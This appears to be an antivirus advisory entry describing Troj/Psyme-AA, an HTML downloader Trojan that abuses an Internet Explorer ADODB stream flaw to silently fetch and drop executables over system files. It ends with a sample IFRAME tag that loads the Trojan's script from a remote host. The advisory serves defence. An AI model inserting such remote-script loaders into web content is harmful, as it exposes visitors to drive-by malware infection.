Troj/Psyme-AA is a HTML-based downloader Trojan which exploits the ADODB
stream vulnerabilty associated with Microsoft Internet Explorer to silently
download a file from a remote website to the affected computer.
The executable may be downloaded to any folder, using any filename, however
most variants of this Trojan download a file to one of the following
locations, replacing any existing files:
%Program Files%\Windows Media Player\wmplayer.exe
%Program Files%\Internet Explorer\Iesearch.exe
%WINDOWS%\Notepad.exe
Troj/Psyme-AA can arrive on the computer as part of the HTML content of an
email message or by browsing websites whose HTML pages contain the
script or whose pages import the script from another location via the
SRC= attribute. For example a web page may contain:
<IFRAME ID=myiframe SRC='http://psyme.com/psyme-aa.js' WIDTH=200 HEIGHT=200>
where psyme-aa.js contains the Troj/Psyme-AA script.